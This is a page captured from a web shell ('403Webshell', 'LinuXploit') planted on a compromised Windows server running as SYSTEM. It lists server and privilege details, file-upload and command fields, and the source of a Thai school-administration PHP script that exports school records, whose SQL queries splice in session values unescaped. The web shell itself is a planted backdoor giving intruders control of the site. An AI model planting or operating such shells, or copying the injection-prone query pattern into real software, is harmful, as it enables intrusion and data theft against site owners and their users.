403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/csr/admin/report/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/news/csr/admin/report/schoolarea.php
<?php  
if(!isset($_SESSION)) session_start();
if(isset($_SESSION['ugroup'])){ 
$user=$_SESSION["loguser"];
$ugroup=$_SESSION["ugroup"];
//ส่งออกรายชื่อนักเรียน 
error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('display_startup_errors', TRUE);
date_default_timezone_set('Asia/Bangkok');
require_once "../../include/config.php";

$u="";
$output = '';
$sql= $mysqli->query("SELECT * FROM log_school where `areacode`='$user'");
 if(mysqli_num_rows($sql) > 0)
 {

  $output .= '
   <table class="table" bordered="1" border="1">  
                    <tr>  
                        <th>ที่</th>  
                        <th>รหัสโรงเรียน</th>  
                        <th>ชื่อโรงเรียน</th> 
						<th>ตำบล</th>						
						<th>อำเภอ</th>
						<th>จังหวัด</th>
						<th>latitude</th>
						<th>longitude</th>
                    </tr>
  ';
$i = 0;
  while($row = mysqli_fetch_array($sql))
  {
$i++;
$sql1sc= $mysqli->query("SELECT * FROM log_school where `areacode`='$user' ");
$schoolcode=$row['username'];
$total1sc=mysqli_num_rows($sql1sc);
$all=number_format("$total1sc");

	$url_ad = ''.$api_url.'/api/school_obj.php?csid='.$schoolcode;
	$datdd = file_get_contents($url_ad);
	$datdd = json_decode($datdd);
	$tambol=$datdd->subdistrict;
	$ampher=$datdd->district;
	$province=$datdd->province;
	$latitude=$datdd->latitude;
	$longitude=$datdd->longitude;
   $output .= '
    <tr>  
                        <td width=50 align=center>'.$i.'</td>  
                        <td width=120 align=center>'.$u.'&nbsp;'.$row["username"].'</td>  
                        <td width=500>'.$row["fullname"].'</td> 
						<td align=center>'.$tambol.'</td>  						
						<td align=center>'.$ampher.'</td>
						<td align=center>'.$province.'</td>
						<td align=center>'.$latitude.'</td> 
						<td align=center>'.$longitude.'</td>  						

    </tr>
   ';
  }
  $output .= '</table>';
 
$file = "โรงเรียน_" . date('Y-m-d') . ".xls";
header('Content-Disposition: attachment; filename='.$file);
header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
header("Content-Transfer-Encoding: BINARY");
echo $output;

 }
} else {
header("Location: ../index.php?msg=error");
exit;
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit